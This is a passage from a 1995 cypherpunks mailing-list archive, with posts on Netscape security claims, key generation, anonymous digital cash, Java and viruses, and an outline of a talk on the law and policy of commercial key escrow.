>           all of the files off of your hard drive or LAN??
> 
>           Or even worse ... erase files on your Hard drive and
>           wipe you out??

  I don't believe this statement to be true.  How about the following:

	If you download a program to your computer that is infected
	with a virus, the virus could send all of the files on your
	hard disk to anyone it wants to, or it could wipe your entire
	hard disk.

  Now, what does this have to do with running netscape?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Tue, 17 Oct 95 17:29:46 PDT
To: "Martin Diehl" <cypherpunks@toad.com
Subject: Re: Using deterministic programs to select private RSA keys.
Message-ID: <aca9fb3f01021004b95f@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 10:38 AM 10/17/95, Martin Diehl wrote:
....
>     I suggest that if you capture the time in microseconds between
>     keystrokes and insert the least significant 8 bits between the
>     corresponding characters (i. e. <letter1> <time2 - time1> <letter2>
>     <time3 - time2> <letter3> ... <letter nnn> <time until double CR -
>     time nnn>) and MD5 the set of values, the resulting "random" value
>     will be different for both people who type different input texts as
>     well as those people who type the same input text.
....
Indeed, but the point of the proposal is a determinate and reproducible
program behavior so as to gain confidence that the output is correct by
comparing output of several programs.
....

>     As regards the observation that MD5 produces only a 128 bit result,
>     you could call MD5 after each nn values (at least 16) have been
>     entered.  In that way a few lines of input and associated timing
>     values could easily generate a value of the same order of magnitude as
>     the number  of 1K primes.
....
Sounds good.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Tue, 17 Oct 95 15:39:27 PDT
To: loofbour@cis.ohio-state.edu (Nathan Loofbourrow)
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash
In-Reply-To: <199510171820.OAA24348@colon.cis.ohio-state.edu>
Message-ID: <951017.172824.4H9.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, loofbour@cis.ohio-state.edu writes:

> And there's another item of note: each chip has a unique, etched,
> machine-readable serial number. What are the bets that Dallas
> Semiconductor can tell you who purchased that chip? Well, so much for
> an anonymous payment scheme based on *this* product.

Dallas might be able to tell who purchased them, but it's likely to have
been someone like Hamilton-Hallmark (a major parts distributor).
Whether the distributors are going to maintain the audit trail is
questionable at best.  It only takes one distributor to break the
chain of traceability, and audit trails cost money.

> * Gee, back in my day EPROMs were Eraseable; these folks mean instead
>   to indicate an Electrically Programmable chip, which sounds like a
>   good old PROM to me. Ahhh, acronyms...

This comes from the fact that PROMs are typically mask-programmed at the
fabrication stage.  EPROMS are programmed in the field.  And yes, if you
could get the top of the chip off cleanly, you could erase and reprogram
them.  (not likely, and hardly undetectable, but it's ever so slightly
possible)  More often, I see these devices called OTP (for One Time
Programmable).  In the more standard types (27C256, for example),
they're a fraction of the cost of the erasable ones.  Ceramic cases and
quartz windows are spendy.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIQv0Rvikii9febJAQEeKAP+LbgyZ/60fGuVICZEqM+Rv34GhEA6a/vg
cKPbKCazUVg8bEBod3mqbHfssjDgD47PcAai8uM3ALmki/TI3DfI6FLbZr7aCpa8
PSNFDTEpmRDpnm5xpbZa/5O1aLdXLX6ps8OGsg0YjY1hvFQCn5tymW9GjhOXrkXS
s698T5nEoQI=
=LoNA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: LaurianneA@aol.com
Date: Tue, 17 Oct 95 15:34:08 PDT
To: cypherpunks@toad.com
Subject: Blacknet
Message-ID: <951017183353_126322969@emout04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Are you still up and running with Blacknet? I just need to know if you can
use some info. Message me here.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Tue, 17 Oct 95 17:07:33 PDT
To: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash
In-Reply-To: <199510171820.OAA24348@colon.cis.ohio-state.edu>
Message-ID: <199510180006.UAA16151@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Loofbourrow writes:
>And there's another item of note: each chip has a unique, etched,
>machine-readable serial number. What are the bets that Dallas
>Semiconductor can tell you who purchased that chip? Well, so much for
>an anonymous payment scheme based on *this* product.

Some enterprising cypherpunks can buy a bunch and resell 'em for cash.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Tue, 17 Oct 95 16:26:05 PDT
To: "Allen J. Baum" <baum@apple.com>
Subject: Re: Yardley's 1st ed. "Black Chamber" $25+
In-Reply-To: <v02120d08aca9ca600cea@[17.255.11.191]>
Message-ID: <Pine.3.89.9510171918.A45932-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 17 Oct 1995, Allen J. Baum wrote:

> I found one in a bookstore. I didn't buy it, but I'll go back and get it &
> ship it if someone is interested.
> 
I have the re-issued paperpack, got it used last year for a few bucks, I think 
it's still in print. (Mail me if you're interested in knowing the 
publisher, I'll try to dig it up)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Tue, 17 Oct 95 17:30:19 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: java flaw
In-Reply-To: <9510171612.AA25185@all.net>
Message-ID: <199510180030.UAA16655@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen writes:
>> 
>> At 06:59 AM 10/17/95 UTC, jerry the golden retriever wrote:
>> > A security feature in Java scans for viruses before activating the
>> > applet.
>> 
>> I hope that this is false.

It is.  Java scans the applet to make sure it doesn't try to cheat
the interpreter into violating the object access rules.  The scanning
has nothing to do with viruses.

>> Even if one had genuine artificial intelligence, it would be impossible
>> to detect all viruses, only particular viruses and classes of virus.
>> 
>> If Java is secure, virus scanning should be unnecessary, indeed 
>> impossible, because there could be no code configuration capable
>> of acting as a virus.
>> 
>> If virus scanning occurs, then it is possible to write a virus in Java,
>> then Java is inherently insecure.
>
>To be more precise, if there is programming, sharing, and transitive
>information flow, viruses can reproduce and spread (as proven
>mathematically in the mid-1980s).  Sice Java offers sharing of
>programs and (for not at least) transitive information flow, viruses
>are possible.

Java doesn't try to prevent viruses (viri?).  It doesn't even claim
such.  It *does* make claims that imply limits on what the virus can
do, though.  If the virus does no more than eat up CPU cycles, it's
fairly benign.  Java is supposed to prevent viruses that destroy files
and damage equipment.  This feature isn't restricted to viruses, though.
Even non-replicating programs aren't supposed to be able to hurt anything.

Whether they achieve this goal or not is a matter of some debate.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Tue, 17 Oct 95 20:39:40 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510171851.AA13486@softnc.com>
Message-ID: <308476FF.7815@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


> Is Jeff or any of the other netscape posters here officially??

I speak for myself. I am not an official Netscape spokescritter, and
have no desires to be one.

> Or are they here, just out of personal curiosity (without their employers
> knowledge, I mean ...) cause they have a whole lot of spare time on their
> hands to learn about cryptography and security.

I don't have a lot of spare time, but I do consider reading the
messages going to cypherpunks as part of my job. (Well at least some
of each message. :-)

> I wish one of them (or Netscape) would make an official comment to make
> sure that the record is straight, and that there is no mis-reporting.

On what topic?

>         - Netscape has known about this problem since last week's
>           scathing public attack and demonstration of the problem
>           which included sample code posted to the Internet??

I am not quite sure what problem you are talking about? NFS and MITM
ftp attacks?

>         - If you run and use a Netscape client, that any machine
>           anywhere in the world if it's on the Net could retrieve
>           all of the files off of your hard drive or LAN??
> 
>           Or even worse ... erase files on your Hard drive and
>           wipe you out??

Can you expand on this? I am not aware that any of the executables
we have shipped do this. If you get a compromised version of any
program (i.e. one that some attacker has changed) then that changed
version will do whatever the attacker has built it to do. This is not
a Netscape specific issue.

>         - Even if your machine is behind a firewall or proxy server,
>           that there is no protection??  That you can't do anything??

Firewalls and proxies help against many attacks. Without knowing
which one you mean, it's impossible to respond intelligently. (In
particular I know of no sites that allow NFS packets to cross a
firewall boundary.)

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Tue, 17 Oct 95 17:45:15 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: My chat with Goeff Greiveldinger
In-Reply-To: <9510171621.AA12393@tis.com>
Message-ID: <Pine.SUN.3.91.951017203951.13039C@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Here is my first cut at what I plan to say.   Not real exciting, but I 
don't know how much knowledge to assume in the audience.

I would be grateful for a pointer to any commercial key escrow services 
that are actually in operation today.  And doubly grateful for a pointer 
to one that does not rely on a proprietary encryption scheme and/or one 
that allows/requires key splitting for extra security.

Key Escrow in Secure Electronic Commerce 
October 19, 1995 4:30 pm - 5:50 pm 

Outline

Intro:
In this talk I will...
     *    Begin with why business wants/needs *data* CKE
     *    Turn then to law enforcement focus on communications KE
     *    Explain how govt hardball on export control in pursuit
          of Comm KE threatens needed CKE -- or at least US
          companies' share of that market...
     *    Discuss pending issues

I.   Commercial key escrow, the WHAT, WHY, WHO and HOW

     A.   WHAT 
     Give someone (internal/external) copies of keys (private/
     symmetric) used in the course of business
          1.   Essential (from corporate perspective) for
               a.   all encrypted, stored corporate data
               b.   keys with power
                    (1)  to sign things in corporate name e.g.
                         buy/sell
                    (2)  to issue certificates

          2.   Less essential (from corporate perspective)
               a.   for email keys
                    but still pretty important if you might have
                    to reconstruct exchanges of messages at a
                    later date.
               b.   for telephone keys
                    although useful if you think there will be
                    need for you and/or police to spy on your
                    employees, eg. investigate fraud/theft.

     B.   WHY
          1.   Irresponsible for corporation not to encrypt data
               and some communications if these are of commercial
               value to competitors/otherwise sensitive
          2.   Irresponsible to encrypt data (and maybe also
               communications) and not have fail-safe means of
               access
               a.   employees lose their keys
               b.   employees die
               c.   employees quit (and vanish or do some vandalism)
               d.   employees are suspected of engaging in hanky-
                    panky

     C.   WHO
          Escrow agent could be 
          1.   internal
               a.   only viable solution right now unless you are
                    satisfied with, e.g., RSA non-interoperable
                    crypto system
               b.   but are you hacker-proof?

          2.   external, e.g.
               a.   TIS licensed "Data Recovery Center" (but
                    there are none in existence today)
               b.   bankerstrust
               c.   govt agency (someday? but not today)
               d.   can use split key systems for increased
                    security. [but is anyone actually offering such a 
                    service?]

          One problem with external is that NONE of the liability
          issues are resolved.  E.G.  Suppose private escrow
          agent complies in good faith with facially valid
          warrant, but warrant is l

     D.   HOW
          Here we have more doubts than knowledge
          Not clear yet what security precautions commercial
          escrow agents will offer.  Can assume:
          1.   Secure systems
          2.   Contract-driven mechanism for verifying IDs/bona
               fides of persons attempting to take out data
          3.   Contract-driven assurances of speed of response
          4.   split key systems with different escrow agents?


II.  Legal implications of commercial key escrow

     Three families of issues: 
          1.   data owner liability for not escrowing
          2.   escrow agent liability for errors
          3.   Government access to keys

     A.   It is irresponsible NOT to escrow keys if you encrypt
          data.  And it is increasingly irresponsible not to
          encrypt.  Hence some form of escrow will become
          practically mandatory.
          1.   Query: won't this make it easier for the
               government to get access to my data?  

               Answer: must distinguish between stored data and
               communications.   You are escrowing the keys not
               the data itself.  The data remains secure in your
               own machine/tape/safe/whatever.  There it's
               subject to subpoena just like paper records.  So
               encryption + escrow is no substitute for
               destroying the smoking gun, but it's also no more
               danger than ordinary records.

               Escrowing keys used for communication makes those
               communications more vulnerable to government
               interceptions.  Strong, unescrowed, keys may
               defeat even a lawful subpoena for a wiretap. 
               Escrowed keys are vulnerable to legal (at least)
               wiretaps.  

          2.   More on "practically mandatory":  The government
               may make it a condition of doing certain kinds of
               business, e.g. govt contracting, that only
               escrowed encryption be used.   Similarly, the
               government may be willing to engage in secure
               communications with the public, but only via
               system that are limited to escrowed keys.

          3.   Still more on "practically mandatory": carrot &
               stick of export controls (see below).

     B.   Escrow agent liability for errors

          Currently, rights and resp of customer vs. escrow
          agents depend on whether escrow agent is public or
          private

          1.   Public escrow agent -- low accountability?

     In the "Clipper 1" proposals, the escrow system lacked any
legal guarantees for the people whose keys are generated by the
government and held by the escrow agents.  Indeed, the Attorney
General's escrow procedures stated that they 
     do not create, and are not intended to create, any
     substantive rights for individuals intercepted through
     electronic surveillance.  
In short, the government disclaimed in advance any reliance
interest that a user of an EES-equipped device might have in the
government's promise to keep the key secret.  A victim of an
illegal wiretap would have a cause of action under Title III
against the wiretapper, but, it appears, no remedy against the
escrow agents, even if the escrow agents acted negligently or
failed to follow their own procedures.  The Attorney General's
procedures themselves are merely directives.  They are not even
legislative rules, which might be subject to notice and comment
restrictions before being rescinded.  A future administration
could, if it wanted, secretly instruct the escrow agents to
deliver copies of the keys to an intelligence or law enforcement
agency, or even White House plumbers, thereby violating no law
or regulation (the plumbers, though, would violate Title III when
they used the information).  Because the chip-unique keys were
voluntarily disclosed to the government, the chip's owner might
lack a legitimate (that is, enforceable) expectation of privacy
in the information. 

     If the intercepted communication were an e-mail or a file
transfer, rather than a telephone call, the chip owner subject to
an illegal or inadvertent disclosure by the escrow agents may be
in a particularly weak position if the information ever makes its
way to court:  many Title III protections granted to voice
communications do not apply to transfers of digitized data.

     Shortly before the 103d Congress adjourned, Congressman
George Brown introduced the Encryption Standards and Procedures
Act of 1994, which would have waived the sovereign immunity of
the United States for willful but unauthorized disclosures of
key fragments by its officialsand excluded liability in all
other circumstances.  In the absence of similar legislation,
however, there may currently be no monetary remedy even for a
willful disclosure.

          2.   Private escrow agent -- contract accountability,
               tort, maybe bailee/trustee (dubious)

     If you want software key escrow today, you have to be your
own escrow agent, or go to a private escrow agent because there
is no government agency ready and able to act in this capacity
(and few private bodies!)  Given current liability rules, you
would be better off with a private body than the government
anyway (tradeoff: maybe more security in government agency (?)
vs. more recourse against private party).

     The "son of clipper" trial balloon floated this fall
suggested that export permission would be given to (relatively)
strong (ie. 64 bit max) software cryptosystems, if those systems
were designed to ensure that the keys were escrowed with an
"approved escrow agent".  NIST solicited comments in Sept. '95 as
to 
               a.   what sort of bodies would be suitable, and 
               b.   what terms and conditions should govern the
                    escrow agents.  
               c.   What procedures need to be developed for the
                    storage and safeguarding of keys?
               d.   Performance criteria (e.g., around-the-clock
                    availability, accessibility, reliability,
                    etc.) for approved key escrow agents?
               e.   Under what circumstances will key escrow
                    agents in foreign countries be approved?
               f.   Should approval of key escrow agents be tied
                    to a public key infrastructure (for digital
                    signatures and other purposes)?  
     [The last point is potentially ominous...if access to
     digital signature infrastructure is conditions on using KE,
     then this makes export control hardball look like small
     beer]

     To date there has been no public feedback from NIST
subsequent to the meeting except that they are revising the
criteria in light of what they heard.  [Can GG tell us more?]


     C.   Government access to keys

          NB that government seems primarily interested in
communications; business main focus is/should be DATA.

     Now with "Son of Clipper" (software KE), the government has
relaxed the suggestion that keys be generated and escrowed via
hardware (e.g. Fortezza), but has substituted onerous criteria it
hopes it can persuade (threaten?) industry to apply to software,
including:


III. (Mostly specious) Arguments Against Commercial Key Escrow
[with apologies to Marc Rotenberg, Electronic Privacy Information
Center, who posted the quoted material to USENET several months
ago]

     A.   Bad for business
          1.   "Increased network vulnerability.  The key escrow
               configuration necessarily increases the likelihood
               of communications compromise and improper
               interception by third parties. Computer crime will
               skyrocket."

               Very unrealistic and alarmist.  While as a
               theoretical matter it is clearly true that the
               sharing the keys with the escrow agent must create
               an avenue of attack that did not exist before, the
               risk can be very greatly reduced by 
               a.   key splitting (never send the whole key to
                    anyone at any time)
               b.   secure communications with very secure
                    algorithms between escrow agent and customer
                    [NB that US government export policy
                    implicates this to the extent it makes strong
                    crypto non-exportable]

          2.   "Policy incoherence.  The key management needs of
               business differ sharply from the real-time
               intercept plans of law enforcement. The latter has
               little to do with the former."

               Probably true, but irrelevant to the matter at
               hand: business needs escrowing for its own
               disaster recovery needs.

          3.   "Complexity.  Has anyone really given thought to
               how many communications will be encrypted in 20
               years and what the key management requirements
               will be to develop a unitary key escrow system to
               satisfy the government's concerns?"

               Maybe, maybe not.  But businesses need CKE now. 
               Keys don't live for ever, and a sound security
               plan will include provisions for retiring keys as
               they age.  Age makes keys vulnerable
               a.   technological change makes bruting longer
                    keys possible
               b.   the longer the key is out there the more time
                    attackers have to brute (or otherwise
                    compromise) the key

     B.   Bad for civil liberties

          1.   "Emergency circumstances taps.  The current
               wiretap law permits the initiation of a wiretap
               *without court order* upon a certification that
               emergency circumstances exist. If this procedure
               is built into the CKE procedure, then there will
               be *no judicial review* prior to the disclosure of
               keys."

               True.  But these taps are currently rare, and
               limited to cases like kidnapping where lives are
               at stake.  It's fairly unlikely that a business
               will ever encounter one of these.


          2.   "The future of PGP.  Will PGP and other non-escrow
               schemes be permitted if CKE is adopted? What will
               be the implications for developers and companies
               in the communications industry?"

               Voluntary CKE in and of itself is not going to
               affect the legality of alternative un-escrowed
               crypto.  The politics are hard to predict: one can
               imagine arguments that mandatory escrow is not
               needed because it's being done voluntarily; and
               also arguments that the increasing voluntary CKE
               means that there's less reason not to make it
               mandatory.   My guess: no great effect one way or
               the other.  The issue will be settled by larger
               things e.g. what's more scary -- Oklahoma City or
               Ruby Ridge?

IV.  Recent Developments in key escrow

     A.   NIST initiatives

          NIST is currently putting "final touches" on draft
          export criteria, under auspices of inter-agency working
          group. NIST hopes to "notice" revised draft criteria in
          fed register, perhaps within the next month; then a
          60day comment period, with a 1-day live meeting in DC
          sometime during the comment period.


          When NIST has final version of inter-agency
          recommendations set, they will be turned over to the
          state dept to implement; state can do what it likes. 
          One possible model for State Dept. action is a change
          to the ITAR.

V.   Outstanding Issues
     A.   Why would any foreign company use US govt approved
          crypto in light of new focus on economic intelligence,
          e.g. Japan spy case?
          Possible govt responses:
          1.   foreign govt might have copy of key?  share key?
          2.   foreign-based, but US-approved, escrow agent might
               hold/share key

     B.   MANDATORY CKE?
          1.   Legislation?
          2.   "milder variants"
               a.   export control club (is 64 bits enough?)
               b.   data vs. communications issue
               c.   Digital signature infrastructure access club
                    (informal talks suggest this is not likely,
                    but not formally ruled out....)

     C.   Enabling ("technical") legislation
          1.   Title III exemption for escrow agent
          2.   Authority to "certify" escrow agents
          3.   liability rules for escrow agents

     D.   Enabling regulations
          1.   Care & feeding of escrow agents, 
               a.   eg. sample criteria for being approved and/or
                    sample contract between government and escrow
                    agent
               b.   performance criteria for escrow agents e.g.
                    response time

     E.   Liability in the absence of legislation
          1.   First, find someone actually selling escrow
               services with an interoperable product.
          2.   Or, resign yourself to eg RSA keys.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Tue, 17 Oct 95 18:02:12 PDT
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: DalSemi: Add-Only Memory for Storage of Digital Cash
In-Reply-To: <199510180006.UAA16151@universe.digex.net>
Message-ID: <Pine.3.89.9510172053.A73291-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 17 Oct 1995, Scott Brickner wrote:

> Nathan Loofbourrow writes:
> >And there's another item of note: each chip has a unique, etched,
> >machine-readable serial number. What are the bets that Dallas
> >Semiconductor can tell you who purchased that chip? Well, so much for
> >an anonymous payment scheme based on *this* product.
> 
> Some enterprising cypherpunks can buy a bunch and resell 'em for cash.
> 
And then sell the serial address for cash.
How do I know that they (this means YOU! :> ) don't work for the company?
(which is a contracter for, blackmail-victim of, tentacle of NSA, CSE, 
TCMAY, Purplenet, your fairy-stepmother ...)

Of course there's always the mail-drop & forward-net... (anyone one know
maildrop company addresses, the possible (il)legality of these things or 
any reported monitoring cases? A physical remailernet might come to matter in an
economy where the "split" between an untaxable info economy and a 
taxable physical economy become pronounced. Though it's kinda hard to encrypt
and reorder packages.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Tue, 17 Oct 95 18:20:51 PDT
To: cypherpunks@toad.com
Subject: if-comp: Project to make Fact true (fwd)
Message-ID: <Pine.3.89.9510172119.A28171-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


This is something I got off the Idea Futures computers list.
(The Fact claim is that a 512 bit number will be factored by '97)
I don't know if the following address has been posted here before. 

---------- Forwarded message ----------
Date: Tue, 17 Oct 95 13:45:40 PDT
From: Robin Hanson <hanson@hss.caltech.edu>
To: if-comp@merak.com
Subject: if-comp: Project to make Fact true


A team at Bellcore seems to be planning to try and make the claim Fact true.
See this web page, and the forward in particular:

   http://kayak.npac.syr.edu:2008/ 

They plan to use the web to allow lots of machines to easily participate.
They will start with a 130-digit number and work their way up to the
155-digit number required to satisfy the claim.

Will they succeed by the end of '97?  A crypto expert friend of mine
claims their chances are 90%.  I have bet accordingly.

Robin Hanson  hanson@hss.caltech.edu  http://www.hss.caltech.edu/~hanson/
818-683-9153  2433 Oswego St., Pasadena, CA  91107   FAX: 818-405-9841
818-395-4289  Div. Hum. & Soc. Sci. 228-77 Caltech, Pasadena, CA 91125





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Tue, 17 Oct 95 18:39:15 PDT
To: williams@va.arca.com
Subject: Re: Security Spectra (Oops)
Message-ID: <Pine.3.89.9510172141.F23956-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: 17 Oct 1995 14:13:10 GMT
From: Jeff Williams <williams@va.arca.com>
To: cypherpunks@toad.com
Subject: Re: Security Spectra

P.J. Ponder writes:

> In your recent post to the cypherpunks mailing list you proposed a 
> taxonomy of security weaknesses and vulnerabilities, adding that these 

Please watch your attribution.  Vlad Nuri proposed this rating scheme.

Oops.  Sorry about that.
-------------------------------------------------------------------------
On another matter, what's wrong with Mr. W of NetScape Communications 
subscribing to this list, maybe even posting once in a while if he feels 
like it, and in general just being a list subscriber like the rest of 
us?  Remember, as Mr. PM says - 'It's not a group, it's a mailing list'.
Mr. Weinstein's sig file says his posts are his own opinions, anyway.  
NetScape biggies have certainly posted on this list before and probably 
will again when they have something they want to send to the list, like a 
press release.  Cut Jeff some slack. (apology to international readers, 
that's an Americanism for quit busting his chops.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Tue, 17 Oct 95 18:42:04 PDT
To: cypherpunks@toad.com
Subject: Re: if-comp: Project to make Fact true (fwd)
In-Reply-To: <Pine.3.89.9510172119.A28171-0100000@aix2.uottawa.ca>
Message-ID: <Pine.3.89.9510172143.A54217-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


This is the exact wording of the claim from my previous post (there are 
also a few other crypto claims being traded).

   Fact [comp]
   512 Bit number factored by '97
   
   Before 1997 GMT a number of the following form will have been
   factored. The number must be at least 512 bits long, and be the
   product of two primes, each at least 200 bits long. The factoring
   method must not rely on any special properties of the number (except
   the fact that there are only two factors). In particular, if the
   factors were chosen by the group doing the factoring, then the
   technique must not have used any information about the particular
   factors chosen. The result must be published in a reputable journal.
   The paper must include a description of how the factoring was
   accomplished. The result must be reproducible, at least in theory (it
   need not have been reproduced). To be judged one year later to allow
   time for publication. Note: 512 bit number means number >= 2^511 A
   project to factor 512 bit number might not qualify because the factors
   are too small or there are 3 factors. They will know before you. 
   
   Owner: loki@nately.ucsd.edu, Wording changes allowed by Owner
   
   Posted to: sci.crypt, Interval: monthly
   
   Judge by: TBD on 98/1/1
   
   Plot price data as GIF or ASCII  
     _________________________________________________________________ 
   
   Go to the list of claims.
   Go to the introductory page.  
     _________________________________________________________________ 
   
   Meta Disclaimer: this is not real money (all other disclaimers are
   superfluous)...
   Mark James (jamesm@skyler.arc.ab.ca)
   Last update Monday, 16-Oct-95 03:01:27 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 17 Oct 95 21:56:33 PDT
To: karlton@netscape.com (Phil Karlton)
Subject: Re: Netscape rewards are an insult
In-Reply-To: <308476FF.7815@netscape.com>
Message-ID: <199510180451.VAA23663@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I am not quite sure what problem you are talking about? NFS and MITM
> ftp attacks?

	This character has been going on and oon regarding some big
hole he apparently found in netscape, but no one else on the list
seems to have noticed anything, or replicated any alleged claims he
may have made. Maybe if the person in question would repost this
alleged post describing some massive hole, it would help us all.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Tue, 17 Oct 95 15:31:57 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510110939.FAA26747@pipe4.nyc.pipeline.com>
Message-ID: <199510172229.PAA07421@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Oct 1995 05:39:04 -0400, you wrote:

>   The New York Times, October 11, 1995, pp. A1, D3.
>

Does anyone know if the paper that spurred this article is online, and
if so where.


Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 17 Oct 95 20:09:22 PDT
To: cypherpunks@toad.com
Subject: Re: [ANNOUNCEMENT] eCash reality !!
Message-ID: <199510180307.XAA23559@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <3R85cD1w165w@berserk.com>, usura@berserk.com (Alex de Joode) wrote:

> e-WAVE [issue 42], a dutch language electronic newsletter
> published by Riverland Publications, reports that DigiCash 
> has reached agreement with a big US bank to make eCash real. 
> 
> DigiCash promised the 'scoop' to Newsweek, so in next monday's 
> issue of Newsweek we will know wich bank that is. (They are also 
> said to be talking with a Dutch or Belgian bank or financial 
> institution). 
> 
> Since there has been cut a deal with the monetary powers I wonder 
> if we get the whole anonymous ecash or a 'diluted spieces'.

It will have the same features as the Ecash used in the trial. Payer is
anonymous, but the payee isn't. I hope that I'll be able to finish some
perl scripts that add this badly needed, but for political reasons
missing, feature by the end of the month.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMIRvWioZzwIn1bdtAQHT8wF+JUheIIJxAV4ER1+lPddZhr744rR9N0/f
Ps0CIGNK9Ie16XVBMXx4J0OkKqCjP0PW
=HFWw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 17 Oct 95 23:12:19 PDT
To: cypherpunks@toad.com
Subject: Re: A comment about Netscape 2 and certifictes
In-Reply-To: <199510180307.XAA23559@book.hks.net>
Message-ID: <308499D0.4412@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


This is exactly the same list that was in Netscape 1.x.  The
commercenet CA only appeared in 1.2 and the 1.22/1.12 security
update.  This list will change before 2.0 is released.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VINCENT810@aol.com
Date: Tue, 17 Oct 95 20:43:08 PDT
To: Cypherpunks@toad.com
Subject: I want to learn!
Message-ID: <951017234254_126621887@mail06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Can someone please show me the ropes on becomeing a cypherpunk!!!! Thanxs.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Tue, 17 Oct 95 21:32:45 PDT
To: cypherpunks@toad.com
Subject: Truth serum, tuition & Re: PINs
In-Reply-To: <199510180315.EAA27271@utopia.hacktic.nl>
Message-ID: <Pine.3.89.9510172359.A22460-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 18 Oct 1995, Anonymous wrote:

> What if You had Two PINs ???
> And One Works and One Sounds a Silent Alarm Then If You are Forced 
to give your PIN ,You give Them your Second PIN 
> and They get Caught !!!!!!
Yeah, that's what was being talked about: duress pins. Except (see 
previous messages) the problems arise from the fact that all criminals
will presumably know this and have some computational resources to deal
